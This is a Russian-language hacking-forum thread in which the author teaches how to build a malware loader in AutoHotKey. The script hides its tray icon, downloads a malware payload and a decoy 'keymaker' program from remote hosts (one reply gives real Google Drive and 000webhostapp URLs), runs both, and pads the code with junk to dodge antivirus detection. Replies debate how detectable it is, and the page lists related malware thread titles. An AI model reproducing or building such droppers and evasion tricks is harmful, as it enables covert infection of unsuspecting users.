Author's article We make gluing and loader with our own hands! 0 investments!

ОхранникОффтопа · May 4, 2019

Здарова ребят, сегодня я покажу бесплатный способ сделать простенький лоадер для вашего мальваря.
Помимо всей лёгкости этого дела, данному лоадеру очень легко чистить детекты.

Почему это лучше покупных лоадеров?
А вам нравится каждую неделю платить за чистку детектов? Если вы конечно, не умеете сами криптовать файлы.
Здесь же всё очень просто, и вы не рискуете своим мальварём, ибо пользователь с ним напрямую не контактирует.
А также нет зависимостей и не нужны права администратора.

Язык программирования: AutoHotKey. Уровень сложности: тупой сампер. Поехали!

Для начала, где будем писать?
Да где угодно, хоть в блокноте, главное потом текстовому файлу изменить разрешение на .ahk
Но для своей удобности я воспользуюсь SciTE4AutoHotKey, Т9 на функции, компилятор и прочие приколюхи.
Также устанавливаем библиотеку AutoHotKey с официального сайта — autohotkey.com

С чего начнём?
Начнём с того, что обозначим, что наша программа будет работать без иконки в трее.
#NoTrayIcon

Code
#NoTrayIcon
Далее, загружаем склеиваемый файл и сам мальварь на хостинг, или ФО. Главное чтобы на них была прямая ссылка.
После этого, вставляем 2 функции загрузки файла, с сохранением в временное хранилище.
#NoTrayIcon

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

Code
#NoTrayIcon



URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe
Первый файл - пусть будет условно наш ******.
Второй файл - софт, который просто нужен жертве.

Далее, запускаем цикл, который проверяет файлы на наличие, и после их обнаружения запускающий их.
#NoTrayIcon

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

Loop
{
IfExist, %A_Temp%\st.exe
{
IfExist, %A_Temp%\keymaker.exe
{
Run, %A_Temp%\keymaker.exe
Run, %A_Temp%\st.exe
Sleep, 1000
ExitApp
}
}
}

Code
#NoTrayIcon



URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe



Loop

{

    IfExist, %A_Temp%\st.exe

    {

        IfExist, %A_Temp%\keymaker.exe

        {

            Run, %A_Temp%\keymaker.exe

            Run, %A_Temp%\st.exe

            Sleep, 1000

            ExitApp

        }

    }

}
IfExist проверяет наличие файлов в временном хранилище. После проверки, если она успешная, запускаются 2 файла, наш мальварь, и софт который собственно нужен жертве.
Далее просто лоадер закрывается, пользователь работает с софтом который ему нужен, а мальварь выполняет своё дело.

Как чистить детекты?
Очень просто, добавляем бесполезную нагрузку в код софта, например присваиваем переменным различные значения:
#NoTrayIcon

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

Loop
{
IfExist, %A_Temp%\st.exe
{
IfExist, %A_Temp%\keymaker.exe
{
Run, %A_Temp%\keymaker.exe
Run, %A_Temp%\st.exe
Sleep, 1000
ExitApp
}
}
}

A:= 228
B:= A
C:= "fqfqfvwg"
B:= C
A:= 25868

Code
#NoTrayIcon



URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe

URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe



Loop

{

   IfExist, %A_Temp%\st.exe

   {

       IfExist, %A_Temp%\keymaker.exe

       {

           Run, %A_Temp%\keymaker.exe

           Run, %A_Temp%\st.exe

           Sleep, 1000

           ExitApp

       }

   }

}









A:= 228

B:= A

C:= "fqfqfvwg"

B:= C

A:= 25868
После этого, детект чистится.

После написания компилируем в exe и радуемся.
Вес билда ~ 700 кб.

После компиляции у софта будет такая иконка:

Для установления кастомной иконки воспользуемся компилятором от AutoHotKey.
Переходим по пути: Ваш путь\AutoHotkey\Compiler
Запускаем Ahk2Exe, и в строке Custom Icon выбираем свою иконку, компилируем.

Также добавлю из своих наблюдений касательно детектов:
Начальный детект - 2/70
Спустя 2-3 дня детект - не более 6/70
При этом начальный детект составляет 2 нонейм АВ, а в конечном там максимум окажется Kaspersky.
И это всё учитывая то, что я намеренно сливал на VirusTotal для проверки данной информации.
Так что у Вас может быть всё куда круче!

Вот и всё, вроде бы рассказал обо всех аспектах этого дела.
Надеюсь кому-нибудь будет полезна эта информация, и сэкономит не мало деньжат.
Всем спасибо

ayan2030 · May 4, 2019

sharaskidaem а что если наш мальварь с детектами?

Tawer1337 · May 4, 2019

ayan2030, сделать крипт для малваря, не?

ОхранникОффтопа · May 5, 2019

Народ жду вашего мнения)

NikitaJoy1992 · May 5, 2019

Очень хорошая тема !

Cal_inactive496112 · May 5, 2019

ОхранникОффтопа Здарова ребят, сегодня я покажу бесплатный способ сделать простенький лоадер для вашего мальваря.
Помимо всей лёгкости этого дела, данному лоадеру очень легко чистить детекты.

Почему это лучше покупных лоадеров?
А вам нравится каждую неделю платить за чистку детектов? Если вы конечно, не умеете сами криптовать файлы.
Здесь же всё очень просто, и вы не рискуете своим мальварём, ибо пользователь с ним напрямую не контактирует.
А также нет зависимостей и не нужны права администратора.

Язык программирования: AutoHotKey. Уровень сложности: тупой сампер. Поехали!

Для начала, где будем писать?
Да где угодно, хоть в блокноте, главное потом текстовому файлу изменить разрешение на .ahk
Но для своей удобности я воспользуюсь SciTE4AutoHotKey, Т9 на функции, компилятор и прочие приколюхи.
Также устанавливаем библиотеку AutoHotKey с официального сайта — autohotkey.com

С чего начнём?
Начнём с того, что обозначим, что наша программа будет работать без иконки в трее.
#NoTrayIcon

Code
#NoTrayIcon
Далее, загружаем склеиваемый файл и сам мальварь на хостинг, или ФО. Главное чтобы на них была прямая ссылка.
После этого, вставляем 2 функции загрузки файла, с сохранением в временное хранилище.
#NoTrayIcon

URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe
URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe

Code
#NoTrayIcon



URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe

URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe
Первый файл - пусть будет условно наш ******.
Второй файл - софт, который просто нужен жертве.

Далее, запускаем цикл, который проверяет файлы на наличие, и после их обнаружения запускающий их.
#NoTrayIcon

URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe
URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe

Loop
{
IfExist, %A_Temp%\st.exe
{
IfExist, %A_Temp%\keymaker.exe
{
Run, %A_Temp%\keymaker.exe
Run, %A_Temp%\st.exe
Sleep, 1000
ExitApp
}
}
}

Code
#NoTrayIcon



URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe

URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe



Loop

{

    IfExist, %A_Temp%\st.exe

    {

        IfExist, %A_Temp%\keymaker.exe

        {

            Run, %A_Temp%\keymaker.exe

            Run, %A_Temp%\st.exe

            Sleep, 1000

            ExitApp

        }

    }

}
IfExist проверяет наличие файлов в временном хранилище. После проверки, если она успешная, запускаются 2 файла, наш мальварь, и софт который собственно нужен жертве.
Далее просто лоадер закрывается, пользователь работает с софтом который ему нужен, а мальварь выполняет своё дело.

Как чистить детекты?
Очень просто, добавляем бесполезную нагрузку в код софта, например присваиваем переменным различные значения:
#NoTrayIcon

URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe
URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe

Loop
{
IfExist, %A_Temp%\st.exe and %A_Temp%\keymaker.exe
{
Run, %A_Temp%\keymaker.exe
Run, %A_Temp%\st.exe
Sleep, 1000
ExitApp
}
}

A:= 228
B:= A
C:= "fqfqfvwg"
B:= C
A:= 25868

Code
#NoTrayIcon



URLDownloadToFile, https://drive.google.com/uc?export=download&id=1eLrPL4LFNV5rP4r4GDZzZf2FHu0EvSsr, %A_Temp%\st.exe

URLDownloadToFile, http://tgforfeit.000webhostapp.com/keymaker.exe, %A_Temp%\keymaker.exe



Loop

{

    IfExist, %A_Temp%\st.exe and %A_Temp%\keymaker.exe

    {

        Run, %A_Temp%\keymaker.exe

        Run, %A_Temp%\st.exe

        Sleep, 1000

        ExitApp

    }

}









A:= 228

B:= A

C:= "fqfqfvwg"

B:= C

A:= 25868
После этого, детект чистится.

После написания компилируем в exe и радуемся

После компиляции у софта будет такая иконка:

Для установления кастомной иконки воспользуемся компилятором от AutoHotKey.
Переходим по пути: Ваш путь\AutoHotkey\Compiler
Запускаем Ahk2Exe, и в строке Custom Icon выбираем свою иконку, компилируем.

Вот и всё, вроде бы рассказал обо всех аспектах этого дела.
Надеюсь кому-нибудь будет полезна эта информация, и сэкономит не мало деньжат.
Всем спасибо
Click to expand...
Чистим детекты добавлением мусорного кода, пизда

PashaPlay · May 5, 2019

+ Годная тема !

ОхранникОффтопа · May 5, 2019

Cal_inactive496112 Чистим детекты добавлением мусорного кода, пизда
Click to expand...

Я всегда проверяю то, что публикую.
Детект на минимале держится несколько дней, это работает, хотя и звучит не очень
Плюс к этому добавить стоит что ЯП этот не юзался вообще для мальваря, так что для антивирусов это что-то новое

whom · May 6, 2019

Cal_inactive496112, У меня нанём кейлоггер написан)))

whom · May 6, 2019

Cal_inactive496112, Не веришь чишо?

TomRedl · May 6, 2019

Чел в любом случае сольет лоадер на вирус тотал , а вирус тотал найдет в лоадере ******* . так что он не защитит вас от "юзеров"

ОхранникОффтопа · May 7, 2019

TomRedl Чел в любом случае сольет лоадер на вирус тотал , а вирус тотал найдет в лоадере ******* . так что он не защитит вас от "юзеров"
Click to expand...

Уже неделю детекты не повышаются на ******е, каждые 2-3 дня лоадеру чищу и всё

TomRedl · May 7, 2019

ОхранникОффтопа, Возьми хеш своего *******а md5 либо sha не ебу , и чекни не лежит ли он на вт , тогда и поймешь

ОхранникОффтопа · May 7, 2019

TomRedl ОхранникОффтопа, Возьми хеш своего *******а md5 либо sha не ебу , и чекни не лежит ли он на вт , тогда и поймешь
Click to expand...

Да я и до того как эту херь придумал юзал его, естественно лежит.
Но прикол в том, что реально уже неделю детекты не повышаются на ******е. При том, что я свой же лоадер специально на ВТ заливал для чека.

Енот272_inactive171964 · May 7, 2019

URLDownloadToFile winapi функция которую спокойно палит любой ав и дефендер на ратайме. какого хуя тут вообще это обсуждается, если сам смысл обсуждения похерен

Енот272_inactive171964 · May 7, 2019

ОхранникОффтопа Да я и до того как эту херь придумал юзал его, естественно лежит.
Но прикол в том, что реально уже неделю детекты не повышаются на ******е. При том, что я свой же лоадер специально на ВТ заливал для чека.
Click to expand...

>> лоадер специально на ВТ заливал
КАК ЖЕ ВЕСЕЛО БЛЯД

ОхранникОффтопа · May 7, 2019

Енот272_inactive171964 URLDownloadToFile winapi функция которую спокойно палит любой ав и дефендер на ратайме. какого хуя тут вообще это обсуждается, если сам смысл обсуждения похерен
Click to expand...

Дефендер не ругается на него, проверь, потом уже говори)
Весь прикол в том, что всем похуй на лоадер, кроме антивирусов. А прятать его от них приходится всего раз в 2-3 дня уделяя минут 5 времени. И то за пару дней только детектов 3-5 набежит, и всё. Я поэтому и запостил это сюда, потому что это пздц как дёшево и легко

Енот272_inactive171964 · May 7, 2019

ОхранникОффтопа Дефендер не ругается на него, проверь, потом уже говори)
Весь прикол в том, что всем похуй на лоадер, кроме антивирусов. А прятать его от них приходится всего раз в 2-3 дня уделяя минут 5 времени. Я поэтому и запостил это сюда, потому что это пздц как дёшево и легко
Click to expand...

мужик, рекомендую если вкатываешься в малварь, очень глубоко изучать винапи и то какие функции и как палятся. мне проверять незачем, я проверил все до тебя уже сотни раз. ты новичек, я это вижу. но не думай что ты пересек ту черту нубства, которую я пересек 1.5 года тому назад.

ОхранникОффтопа · May 10, 2019

Енот272_inactive171964 мужик, рекомендую если вкатываешься в малварь, очень глубоко изучать винапи и то какие функции и как палятся. мне проверять незачем, я проверил все до тебя уже сотни раз. ты новичек, я это вижу. но не думай что ты пересек ту черту нубства, которую я пересек 1.5 года тому назад.
Click to expand...

Полтора года не научили тебя проверять то, о чём говоришь. Я проливал уже на этот лоадер, абсолютно всем похуй на него, поверь. Просто возьми и сам это сделай, если тебе так не верится, что дефендеру на него абсолютно плевать, а антивирусы без детектов и подавно хуй клали на него

hakzcode · May 21, 2019

Годно, так и хочется симпу въебать, но не могу ._.

Help open the ports

How to sew a virus in the application?

Malware: distribution methods, types of attacks, etc.

How to make an infected PowerShell command that activates your virus

(Click Fix) PowerShell Code in Windows activation and not only: how IEX and IWR methods help hackers

SMS theft virus on Android - Description of the problem, Sample project

We bypass smartkrin, chrome Alert and antiviruses without SMS and loans

We create our signature of code in ten minutes

winlocker for android

Who fumbles how dangerous it is?

How to get a digital code signature?

We get a clean OXI Joiner without glues from the official site.

Making a non-existent BOTA (RAT nickname) for iOS

Spy software for android (up to 10th) Observer

Flipper Zero

Blank-Grabber

How to remove a styller without demolition of Windows?

How to make a working *** with sending to discord.

AI can generate malware that evades detection 88% of the time

How to access another person PC

Android Malware - VNC - AC Node

Gray screen at DCRAT REMOTE Desktop, what to do?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer is a powerful tool for finding hidden threats

Analysis of the old Red Petya virus and other families of this virus

Making a secure webhook for ******* tapping in tg

What miner can be pumped up to a person to drip my grandmas?

New virus gradually exciting Lolz

We put the Redline crack socket in 5 minutes

Multifunctional Android RAT with web panel, no ports.

Author's article We make gluing and loader with our own hands! 0 investments!

Help open the ports

How to sew a virus in the application?

Malware: distribution methods, types of attacks, etc.

How to make an infected PowerShell command that activates your virus

(Click Fix) PowerShell Code in Windows activation and not only: how IEX and IWR methods help hackers

SMS theft virus on Android - Description of the problem, Sample project

We bypass smartkrin, chrome Alert and antiviruses without SMS and loans

We create our signature of code in ten minutes

winlocker for android

Who fumbles how dangerous it is?

How to get a digital code signature?

We get a clean OXI Joiner without glues from the official site.

Making a non-existent BOTA (RAT nickname) for iOS

Spy software for android (up to 10th) Observer

Flipper Zero

Blank-Grabber

How to remove a styller without demolition of Windows?

How to make a working ******* with sending **** to discord.

AI can generate malware that evades detection 88% of the time

How to access another person PC

Android Malware - VNC - AC Node

Gray screen at DCRAT REMOTE Desktop, what to do?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer is a powerful tool for finding hidden threats

Analysis of the old Red Petya virus and other families of this virus

Making a secure webhook for ******* tapping in tg

What miner can be pumped up to a person to drip my grandmas?

New virus gradually exciting Lolz

We put the Redline crack socket in 5 minutes

Multifunctional Android RAT with web panel, no ports.

Author's article We make gluing and loader with our own hands! 0 investments!

How to make a working *** with sending to discord.